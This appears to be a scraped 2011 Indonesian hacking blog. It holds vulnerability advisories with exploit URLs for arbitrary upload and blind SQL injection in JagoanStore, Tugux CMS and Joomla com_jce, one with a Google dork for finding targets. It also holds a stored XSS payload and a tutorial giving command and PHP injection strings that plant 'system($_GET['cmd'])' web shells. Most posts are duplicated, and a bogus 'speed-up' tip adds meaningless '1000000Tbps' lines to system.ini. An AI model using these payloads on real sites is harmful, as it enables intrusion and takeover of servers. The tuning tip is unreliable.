===================================================================
JagoanStore CMS Arbitary file upload vulnerability
===================================================================
Software: JagoanStore CMS
Vendor: www.jagoanstore.com
Price: Rp.900.000 (IDR)
Vuln Type: Arbitary file upload
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss-advisories.blogspot.com
Gratz: Devilzc0de, YOGYACARDERLINK, and YOU !!!
===================================================================
description:
JagoanStore, adalah CMS untuk membuat toko online.
JagoanStore dibuat tidak hanya berdasar pada hal teknis pembuatan website, dalam pembuatannya juga di desain untuk membuat web toko online Anda mampu menjadi senjata ampuh bagi bisnis Anda.
Kini Anda tinggal fokus pada peningkatan penjualan online Anda.
----------------------------------
Vulnerability details:
JagoanStore CMS is using the old version of FCKeditor for upload file to all user.And all know the old version of FCKeditor have a vulnerability and attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked.
Here is the code:
/manage/fckeditor/editor/filemanager/connectors/php/config.php
global $Config ;
// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
// authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1
---
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/userfiles/' ; // <= here is the path of attacker file or shell backdoor will be placed.
// following setting enabled.
$Config['ForceSingleExtension'] = true ; // <= 2
$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ; // <= 3
$Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
---
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked
----------------------------------
exploit & p0c
[!] http://host/manage/fckeditor/editor/filemanager/connectors/uploadtest.html // upload your file here
or
[!] http://host/path_to_CMSBalitbang/manage/fckeditor/editor/filemanager/connectors/uploadtest.html
your shell or file will be placed here
[!] http://localhost/userfiles/ <= here
Nb: You can use trick from pentesters.ir about FCKeditor :D
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
Time Line:
- Bug Reported to vendor
- Vendor Response and confirm the bug
- Vendor apply fix and patch
- Vendor awarded bounty (very kind vendor and this is first local vendor that really nice for me)
==========================| -=[ E0F ]=- |==========================
2011/08/22
2011/07/11
Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss)
===================================================================
Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss)
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info
References:
===================================================================
Vuln c0de on page_text.php
session_start();
require_once "scripts/connect_to_mysql.php";
if (isset($_GET['pid'])){
$pageid=$_GET['pid'];
//------------------------------------------------
$sqlCommand="SELECT lastmodified FROM pages WHERE id='$pageid' LIMIT 1";
$query=mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row=mysqli_fetch_array($query)) {
$date = $row["lastmodified"];
}
mysqli_free_result($query);
//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT admin FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
$admin = $row["admin"];
}
mysqli_free_result($query);
//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT pagebody FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
$body = $row["pagebody"];
}
mysqli_free_result($query);
}
//------------------------------------------------
if (isset($_GET['nid'])){
$nid=$_GET['nid'];
$sql=mysqli_query($myConnection,"SELECT title, date, admin, news FROM news WHERE id='$nid'") or die (mysqli_error($myConnection));
===================================================================
exploit & p0c
[!] page_text.php?nid=[valid nid]
[!] page_text.php?pid=[valid pid]
Example p0c
[!] http://server/page_text.php?nid=12 <= True
[!] http://server/page_text.php?nid=-12 <= False
[!] http://server/page_text.php?pid=51 <= True
[!] http://server/page_text.php?pid=-51 <= False
[+] http://server:3306 <= download the file , save and open with c++ or wordpad will show mysql version
[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: xss
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info
====================================================================
comments.php file is persistant to xss attack
Go to
http://server/comments.php
and put or type this xss c0de into the command box
then the site will direct you to
http://server/latest.php?nid=
and there you go.. xss will pop up
p0c:
http://server/comments.php
or
http://server/path/comments.php
official site: http://www.tugux.com/comments.php
Gratz:
- YOGYACARDERLINK , DEVILZC0DE , etc
- Nofia Fitri (unyu²), whitehat, note, petimati, psycothic_girl, viska agasi (dudutzkuw), wenkhairu, etc (capek aja di ketik semua)
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
Hacking is Art
===================================================================
==========================| -=[ E0F ]=- |==========================
Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss)
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info
References:
===================================================================
Vuln c0de on page_text.php
session_start();
require_once "scripts/connect_to_mysql.php";
if (isset($_GET['pid'])){
$pageid=$_GET['pid'];
//------------------------------------------------
$sqlCommand="SELECT lastmodified FROM pages WHERE id='$pageid' LIMIT 1";
$query=mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row=mysqli_fetch_array($query)) {
$date = $row["lastmodified"];
}
mysqli_free_result($query);
//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT admin FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
$admin = $row["admin"];
}
mysqli_free_result($query);
//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT pagebody FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
$body = $row["pagebody"];
}
mysqli_free_result($query);
}
//------------------------------------------------
if (isset($_GET['nid'])){
$nid=$_GET['nid'];
$sql=mysqli_query($myConnection,"SELECT title, date, admin, news FROM news WHERE id='$nid'") or die (mysqli_error($myConnection));
===================================================================
exploit & p0c
[!] page_text.php?nid=[valid nid]
[!] page_text.php?pid=[valid pid]
Example p0c
[!] http://server/page_text.php?nid=12 <= True
[!] http://server/page_text.php?nid=-12 <= False
[!] http://server/page_text.php?pid=51 <= True
[!] http://server/page_text.php?pid=-51 <= False
[+] http://server:3306 <= download the file , save and open with c++ or wordpad will show mysql version
[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: xss
Download link: http://www.tugux.com/uploads/47/tugux_cms.rar
Author: eidelweiss
contact: admin[at]eidelweiss[dot]info
Home: www.eidelweiss.info
====================================================================
comments.php file is persistant to xss attack
Go to
http://server/comments.php
and put or type this xss c0de into the command box
';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//-->">'>
then the site will direct you to
http://server/latest.php?nid=
and there you go.. xss will pop up
p0c:
http://server/comments.php
or
http://server/path/comments.php
official site: http://www.tugux.com/comments.php
Gratz:
- YOGYACARDERLINK , DEVILZC0DE , etc
- Nofia Fitri (unyu²), whitehat, note, petimati, psycothic_girl, viska agasi (dudutzkuw), wenkhairu, etc (capek aja di ketik semua)
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
Hacking is Art
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/05/28
Understanding Basic Vuln c0de for RCE (Remote Command`s Execution)
Understanding Basic Vuln c0de for RCE (Remote Command`s Execution)
Author: eidelweiss
Home Page: www.eidelweiss.info
Blog Page: http://eidelweiss-advisories.blogspot.com
0x1: Introduce
What is Remode Command Execution (RCE) or arbitrary code execution (ACE)?!!
first thing In computer security, arbitrary code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution or remote code execution vulnerability to describe a software / web application bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such a vulnerability is called an arbitrary code execution or remote code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shellcode to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution or remote code execution
Once the invader can execute arbitrary code directly on the OS, there is often an attempt at a privilege escalation exploit in order to gain additional control. This may involve the kernel itself or an account such as Administrator, SYSTEM, or root. With or without this enhanced control, exploits have the potential to do severe damage or turn the computer into a zombie - but privilege escalation helps with hiding the attack from the legitimate administrator of the system. An arbitrary remote code execution with privilege escalation vulnerability in widely-deployed software is thus the worst vulnerability sub-type of them all. If bugs of this kind become known, fixes are usually made available within a few hours.
0x2: example concept and proof of concept
Here I will try to give an basic example of Remote Command Execution in web application or php script.
But You will neved find this in PHP scripts unless the coder is a monkey.
1. Lets start with an real-life example.All the following examples is real-life.All of them are discovered by me in different php scripts.
The 1st example is an whois lookup script,they execute command in terminal to do that.
Works only on *NIX systems.
Lets take a look in dig.php file :
Bellow is sample code in dig.php file:
include("common.php");
showMenu();
echo '
';
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
.................................... Snip ..............................................
$host = trim($host);
$host = strtolower($host);
echo("Executing : dig @$ns $host $query_type
");
echo '
} else {
?>
From the c0de We are interested in these lines :
$ns = $_GET['ns'];
system ("dig @$ns $host $query_type");
The "ns" variable is unfiltered and can be modified by user.An attacker can use any command
that he want through this variable.We can execute commands like in the previous example.
If we request :
dig.php?ns=whoam&host=pw.net&query_type=NS&status=digging
The command Will not work.Why? Lets split it, server will read or the code will be:
system ("dig whoami pw.net NS");
and that command dont exist and the execution will fail.What to do to work?In *NIX systems
we have the AND operator who can be used in terminal.That operator is ||.So if we make a
request like this :
dig.php?ns=||whoami||&host=pw.net&query_type=NS&status=digging
our command will be succesfully executed. Why ? Because the system will read or our command or Look at the code :
system ("dig ||whoami|| pw.net NS");
will execute the command separately than "dig" and the other.
2. Lets continue with another example,little bit complicated than first.
Some scripts let you to modify the configuration of website after install.Bad mistake
because usually configuration files is .php .
So we have the script instaled.We look in the admin.php file
Code snippet :
if(isset($action) && $action == "setconfig") {
$config_file = "config.php";
$handle = fopen($config_file, 'w');
$StringData = " $"."news_width = '".clean($_POST[news_width])."';\r
$"."bgcolor = '".clean($_POST[bgcolor])."';\r
$"."fgcolor = '".clean($_POST[fgcolor])."';\r
$"."padding = '".clean($_POST[padding])."';\r
$"."subject_margin = '".clean($_POST[subject_margin])."';\r
$"."fontname = '".clean($_POST[fontname])."';\r
$"."fontsize = '".clean($_POST[fontsize])."';\r\n?>";
fwrite($handle, $StringData);
}
We see here that the script save the settings in config.php file.
Now let's see the config.php file content :
Code snippet :
$news_width = '600px';
$bgcolor = '#000000';
$fgcolor = '#ffffff';
$padding = '5px';
$subject_margin = '0px';
$fontname = 'verdana';
$fontsize = '13px';
?>
So we can inject php code in news_width for example .Now,the things will be
more complicated.We can inject our code but we must pay attention to the code.
I will show you an example to understand what I say.
We will inject the following php code in news_width variable.The code will be
written into config.php file. Let's go to admin.php?action=setconfig file and
inject the code.
Code :
The code will become :
$news_width = '';
$bgcolor = '#000000';
$fgcolor = '#ffffff';
$padding = '5px';
$subject_margin = '0px';
$fontname = 'verdana';
$fontsize = '13px';
?>
And that is wrong. If we request the config.php file we will get an parse error:
something like this
Parse error: parse error in /var/www/config.php on line 3
So we must inject something more complicated.
';system($_GET['cmd']);'
Why this code? Look, the code inside config.php file will become :
$news_width = '';system($_GET['cmd']);'';
$bgcolor = '#000000';
$fgcolor = '#ffffff';
$padding = '5px';
$subject_margin = '0px';
$fontname = 'verdana';
$fontsize = '13px';
?>
Lets split it :
$news_width = '';
system($_GET['cmd']);
'';
No parse error, so we can successfully execute our commands. Let's make the request :
config.php?cmd=whoami
No more || because we don't need, only our command is executed.
3. Lets go to the next example. In this script the news are saved in news.txt file.
Lets see the contents of news.txt file :
We can add what we want. We can inject our code and nothing will happen because is .txt file? Wrong.
Lets search deeper the script. We go to post news by accessing post.php .
Lets take a look in post.php
$newsfile = "news.txt";
$file = fopen($newsfile, "r");
..........................................................................
elseif ((isset($_REQUEST["title"])) && (isset($_REQUEST["date"])) &&
(isset($_REQUEST["post"])) && ($_REQUEST["title"]!="") &&
($_REQUEST["date"]!="") && ($_REQUEST["post"]!="")) {
$current_data = @fread($file, filesize($newsfile));
fclose($file);
$file = fopen($newsfile, "w");
$_REQUEST["post"] = stripslashes(($_REQUEST["post"]));
$_REQUEST["date"] = stripslashes(($_REQUEST["date"]));
$_REQUEST["title"] = stripslashes(($_REQUEST["title"]));
if(fwrite($file,$btable . " " . $btitle . " " . $_REQUEST["title"] . " " . $etitle . " " . $bdate . " " . $_REQUEST["date"] . " " . $edate . " " . $bpost . " " . $_REQUEST["post"] . " " . $epost . " " . $etable . "\n " . $current_data))
include 'inc/posted.html';
else
include 'inc/error1.html';
fclose($file);
}
We can see here how the news are written in news.txt file. Input not filtered of course.
Now the news must be displayed to visitors. How the script do that? Lets take a look in
display.php file.
Code snippet :
include("news.txt");
?>
Nice, the news.txt content is included in display.php file. What we do? We go to post.php
and add some news.
We will inject our code in "title" variable. We write there the following code :
so the news.txt content will become :
And our evil code is there. Let's take a look in display.php .That file include the content of news.txt. so the code in display.php will look like :
?>
No parse error or any other problem so we can go to :
display.php?cmd=whoami
and execute succesfully our commands.
4. Now a little bit complicated script than the previous scripts.
In this script, when we register, our details will be saved in php files.
For example Lets take a log or c0de in add_reg.php file :
Code snippet :
$user = $_POST['user'];
$pass1 = $_POST['pass1'];
$pass2 = $_POST['pass2'];
$email1 = $_POST['email1'];
$email2 = $_POST['email2'];
$location = $_POST['location'];
$url = $_POST['url'];
$filename = "./sites/".$user.".php";
................... Snip ...........................
$html = "\$regdate = \"$date\";
\$user = \"$user\";
\$pass = \"$pass1\";
\$email = \"$email1\";
\$location = \"$location\";
\$url = \"$url\";
?>";
$fp = fopen($filename, 'a+');
fputs($fp, $html) or die("Could not open file!");
We can see that the script creates a php file in "sites" directory( ourusername.php ).
The script save all the user data in that file so we can inject our evil code into one
field, I choose the "location" variable.
So if we register as an user with the location (set the "location" value) :
the code inside ourusername.php will become :
$regdate = "13 mei 2011, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";
$url = "http://google.com";
?>
So we will get an parse error. Not good. We must inject a more complicated code
to get the result that we want.
Lets add this code :
\";?>
So the code inside ourusername.php will become :
$regdate = "13 mei 2011, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";?> $url = "http://google.com";
?>
and we will have no error. Why? See the code :
$location = "";?>
Lets split it :
$location = "";
?>
We set the location value to "", close the first php tags, open the tags
again, wrote our evil code, close the tags and open other and add a variable
"xxx" because we don`t want any error. I wrote that code because I want no
error, can be modified to be small but will give some errors(will not
stop us to execute commands but looks ugly).
So we can go to :
sitestarg.et/ourusername.php?cmd=whoami
and successfully execute our commands !!!
Author: eidelweiss
Home Page: www.eidelweiss.info
Blog Page: http://eidelweiss-advisories.blogspot.com
0x1: Introduce
What is Remode Command Execution (RCE) or arbitrary code execution (ACE)?!!
first thing In computer security, arbitrary code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution or remote code execution vulnerability to describe a software / web application bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such a vulnerability is called an arbitrary code execution or remote code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shellcode to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution or remote code execution
Once the invader can execute arbitrary code directly on the OS, there is often an attempt at a privilege escalation exploit in order to gain additional control. This may involve the kernel itself or an account such as Administrator, SYSTEM, or root. With or without this enhanced control, exploits have the potential to do severe damage or turn the computer into a zombie - but privilege escalation helps with hiding the attack from the legitimate administrator of the system. An arbitrary remote code execution with privilege escalation vulnerability in widely-deployed software is thus the worst vulnerability sub-type of them all. If bugs of this kind become known, fixes are usually made available within a few hours.
0x2: example concept and proof of concept
Here I will try to give an basic example of Remote Command Execution in web application or php script.
But You will neved find this in PHP scripts unless the coder is a monkey.
1. Lets start with an real-life example.All the following examples is real-life.All of them are discovered by me in different php scripts.
The 1st example is an whois lookup script,they execute command in terminal to do that.
Works only on *NIX systems.
Lets take a look in dig.php file :
Bellow is sample code in dig.php file:
include("common.php");
showMenu();
echo '
';
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
.................................... Snip ..............................................
$host = trim($host);
$host = strtolower($host);
echo("Executing : dig @$ns $host $query_type
");
echo '
';';
//start digging in the namserver
system ("dig @$ns $host $query_type");
echo '
} else {
?>
From the c0de We are interested in these lines :
$ns = $_GET['ns'];
system ("dig @$ns $host $query_type");
The "ns" variable is unfiltered and can be modified by user.An attacker can use any command
that he want through this variable.We can execute commands like in the previous example.
If we request :
dig.php?ns=whoam&host=pw.net&query_type=NS&status=digging
The command Will not work.Why? Lets split it, server will read or the code will be:
system ("dig whoami pw.net NS");
and that command dont exist and the execution will fail.What to do to work?In *NIX systems
we have the AND operator who can be used in terminal.That operator is ||.So if we make a
request like this :
dig.php?ns=||whoami||&host=pw.net&query_type=NS&status=digging
our command will be succesfully executed. Why ? Because the system will read or our command or Look at the code :
system ("dig ||whoami|| pw.net NS");
will execute the command separately than "dig" and the other.
2. Lets continue with another example,little bit complicated than first.
Some scripts let you to modify the configuration of website after install.Bad mistake
because usually configuration files is .php .
So we have the script instaled.We look in the admin.php file
Code snippet :
if(isset($action) && $action == "setconfig") {
$config_file = "config.php";
$handle = fopen($config_file, 'w');
$StringData = " $"."news_width = '".clean($_POST[news_width])."';\r
$"."bgcolor = '".clean($_POST[bgcolor])."';\r
$"."fgcolor = '".clean($_POST[fgcolor])."';\r
$"."padding = '".clean($_POST[padding])."';\r
$"."subject_margin = '".clean($_POST[subject_margin])."';\r
$"."fontname = '".clean($_POST[fontname])."';\r
$"."fontsize = '".clean($_POST[fontsize])."';\r\n?>";
fwrite($handle, $StringData);
}
We see here that the script save the settings in config.php file.
Now let's see the config.php file content :
Code snippet :
$news_width = '600px';
$bgcolor = '#000000';
$fgcolor = '#ffffff';
$padding = '5px';
$subject_margin = '0px';
$fontname = 'verdana';
$fontsize = '13px';
?>
So we can inject php code in news_width for example .Now,the things will be
more complicated.We can inject our code but we must pay attention to the code.
I will show you an example to understand what I say.
We will inject the following php code in news_width variable.The code will be
written into config.php file. Let's go to admin.php?action=setconfig file and
inject the code.
Code :
The code will become :
$news_width = '';
$bgcolor = '#000000';
$fgcolor = '#ffffff';
$padding = '5px';
$subject_margin = '0px';
$fontname = 'verdana';
$fontsize = '13px';
?>
And that is wrong. If we request the config.php file we will get an parse error:
something like this
Parse error: parse error in /var/www/config.php on line 3
So we must inject something more complicated.
';system($_GET['cmd']);'
Why this code? Look, the code inside config.php file will become :
$news_width = '';system($_GET['cmd']);'';
$bgcolor = '#000000';
$fgcolor = '#ffffff';
$padding = '5px';
$subject_margin = '0px';
$fontname = 'verdana';
$fontsize = '13px';
?>
Lets split it :
$news_width = '';
system($_GET['cmd']);
'';
No parse error, so we can successfully execute our commands. Let's make the request :
config.php?cmd=whoami
No more || because we don't need, only our command is executed.
3. Lets go to the next example. In this script the news are saved in news.txt file.
Lets see the contents of news.txt file :
test |
Posted on: 13/05/2011 |
test |
We can add what we want. We can inject our code and nothing will happen because is .txt file? Wrong.
Lets search deeper the script. We go to post news by accessing post.php .
Lets take a look in post.php
$newsfile = "news.txt";
$file = fopen($newsfile, "r");
..........................................................................
elseif ((isset($_REQUEST["title"])) && (isset($_REQUEST["date"])) &&
(isset($_REQUEST["post"])) && ($_REQUEST["title"]!="") &&
($_REQUEST["date"]!="") && ($_REQUEST["post"]!="")) {
$current_data = @fread($file, filesize($newsfile));
fclose($file);
$file = fopen($newsfile, "w");
$_REQUEST["post"] = stripslashes(($_REQUEST["post"]));
$_REQUEST["date"] = stripslashes(($_REQUEST["date"]));
$_REQUEST["title"] = stripslashes(($_REQUEST["title"]));
if(fwrite($file,$btable . " " . $btitle . " " . $_REQUEST["title"] . " " . $etitle . " " . $bdate . " " . $_REQUEST["date"] . " " . $edate . " " . $bpost . " " . $_REQUEST["post"] . " " . $epost . " " . $etable . "\n " . $current_data))
include 'inc/posted.html';
else
include 'inc/error1.html';
fclose($file);
}
We can see here how the news are written in news.txt file. Input not filtered of course.
Now the news must be displayed to visitors. How the script do that? Lets take a look in
display.php file.
Code snippet :
include("news.txt");
?>
Nice, the news.txt content is included in display.php file. What we do? We go to post.php
and add some news.
We will inject our code in "title" variable. We write there the following code :
so the news.txt content will become :
Posted on: 13/05/2011 |
test2 |
test |
Posted on: 13/05/2011 |
test |
And our evil code is there. Let's take a look in display.php .That file include the content of news.txt. so the code in display.php will look like :
Posted on: 13/05/2011 |
test2 |
test |
Posted on: 13/05/2011 |
test |
?>
No parse error or any other problem so we can go to :
display.php?cmd=whoami
and execute succesfully our commands.
4. Now a little bit complicated script than the previous scripts.
In this script, when we register, our details will be saved in php files.
For example Lets take a log or c0de in add_reg.php file :
Code snippet :
$user = $_POST['user'];
$pass1 = $_POST['pass1'];
$pass2 = $_POST['pass2'];
$email1 = $_POST['email1'];
$email2 = $_POST['email2'];
$location = $_POST['location'];
$url = $_POST['url'];
$filename = "./sites/".$user.".php";
................... Snip ...........................
$html = "\$regdate = \"$date\";
\$user = \"$user\";
\$pass = \"$pass1\";
\$email = \"$email1\";
\$location = \"$location\";
\$url = \"$url\";
?>";
$fp = fopen($filename, 'a+');
fputs($fp, $html) or die("Could not open file!");
We can see that the script creates a php file in "sites" directory( ourusername.php ).
The script save all the user data in that file so we can inject our evil code into one
field, I choose the "location" variable.
So if we register as an user with the location (set the "location" value) :
the code inside ourusername.php will become :
$regdate = "13 mei 2011, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";
$url = "http://google.com";
?>
So we will get an parse error. Not good. We must inject a more complicated code
to get the result that we want.
Lets add this code :
\";?>
So the code inside ourusername.php will become :
$regdate = "13 mei 2011, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";?> $url = "http://google.com";
?>
and we will have no error. Why? See the code :
$location = "";?>
Lets split it :
$location = "";
?>
We set the location value to "", close the first php tags, open the tags
again, wrote our evil code, close the tags and open other and add a variable
"xxx" because we don`t want any error. I wrote that code because I want no
error, can be modified to be small but will give some errors(will not
stop us to execute commands but looks ugly).
So we can go to :
sitestarg.et/ourusername.php?cmd=whoami
and successfully execute our commands !!!
2011/05/24
Tips and Trick Mempercepat Koneksi
step pertama pada PC :
1. klik start => run => control panel => network connections
klik kanan di local area connections => properties => internet protocol (TCP/IP) .ok lalu ubah preferred DNS server nya yang awal misalkan 192.168.5.10 jadi 208.67.222.222 lalu altrnate DNS server yang kosong di isi dengan 208.67.220.220. biar sedikit fresh...jika selesai semua itu ok kan saja semua.
2. klik kanan di my computer => properties => Hardware => Device Manager => ports(COM&LPT) double click => communications port /double click => lalu pilih port setting => ganti Bits per second nya jadi 128000 => dan Flow controlnya jadi Hardware .
step kedua pada browser mozila :
1. tulis di bagian atas or di url nya "about:config" without quote (tanpa tanda petik) lalu enter , nanti akan kluar tulisan or warning lalu klik i'll be careful I promise.
- Network.http.pipelining; False <– klik 2 kali ubah “False” menjadi “True“
- Network.http.pipelining.maxrequests; 4 <-- klik 2 kali ubah “4” menjadi “30“
- Network.http.proxy.pipelining; False <– klik 2 kali ubah “False” menjadi “True“
Kemudian klik kanan di bagian yang kosong/putih terus pilih new terus integer lalu kolom pertama isikan nglayout.initialpaint.delay lalu tekan enter satu kali dan masukan angka 0 dan tekan enter kembali.
lalu Restart ulang mozila firefoxnya
next step for buffer video :
klik start => run => system.ini
lalu tambahkan coode di bawah ini
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps
jika sudah save .
tahap selanjutnya buka mozila lagi.
lalu klik tools => options => advent => network =>lalu setting => manual proxy configurasi
lalu isi dengan proxy kamu.
jika sudah close kan semua. lalu restart mozila nya lagi dan repair kan local network connections anda .
1. klik start => run => control panel => network connections
klik kanan di local area connections => properties => internet protocol (TCP/IP) .ok lalu ubah preferred DNS server nya yang awal misalkan 192.168.5.10 jadi 208.67.222.222 lalu altrnate DNS server yang kosong di isi dengan 208.67.220.220. biar sedikit fresh...jika selesai semua itu ok kan saja semua.
2. klik kanan di my computer => properties => Hardware => Device Manager => ports(COM&LPT) double click => communications port /double click => lalu pilih port setting => ganti Bits per second nya jadi 128000 => dan Flow controlnya jadi Hardware .
step kedua pada browser mozila :
1. tulis di bagian atas or di url nya "about:config" without quote (tanpa tanda petik) lalu enter , nanti akan kluar tulisan or warning lalu klik i'll be careful I promise.
- Network.http.pipelining; False <– klik 2 kali ubah “False” menjadi “True“
- Network.http.pipelining.maxrequests; 4 <-- klik 2 kali ubah “4” menjadi “30“
- Network.http.proxy.pipelining; False <– klik 2 kali ubah “False” menjadi “True“
Kemudian klik kanan di bagian yang kosong/putih terus pilih new terus integer lalu kolom pertama isikan nglayout.initialpaint.delay lalu tekan enter satu kali dan masukan angka 0 dan tekan enter kembali.
lalu Restart ulang mozila firefoxnya
next step for buffer video :
klik start => run => system.ini
lalu tambahkan coode di bawah ini
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps
jika sudah save .
tahap selanjutnya buka mozila lagi.
lalu klik tools => options => advent => network =>lalu setting => manual proxy configurasi
lalu isi dengan proxy kamu.
jika sudah close kan semua. lalu restart mozila nya lagi dan repair kan local network connections anda .
2011/04/08
joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================
joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================
Software: joomlacontenteditor (com_jce)
Vendor: www.joomlacontenteditor.net
Vuln Type: BLind SQL Injection
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Dork: inurl:"/index.php?option=com_jce"
===================================================================
Description:
JCE makes creating and editing Joomla!®
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...
===================================================================
exploit & p0c
[!] index.php?option=com_jce&Itemid=[valid Itemid]
Example p0c
[!] http://host/index.php?option=com_jce&Itemid=8 <= True
[!] http://host/index.php?option=com_jce&Itemid=-8 <= False
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================
Software: joomlacontenteditor (com_jce)
Vendor: www.joomlacontenteditor.net
Vuln Type: BLind SQL Injection
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Dork: inurl:"/index.php?option=com_jce"
===================================================================
Description:
JCE makes creating and editing Joomla!®
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...
===================================================================
exploit & p0c
[!] index.php?option=com_jce&Itemid=[valid Itemid]
Example p0c
[!] http://host/index.php?option=com_jce&Itemid=8 <= True
[!] http://host/index.php?option=com_jce&Itemid=-8 <= False
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/03/30
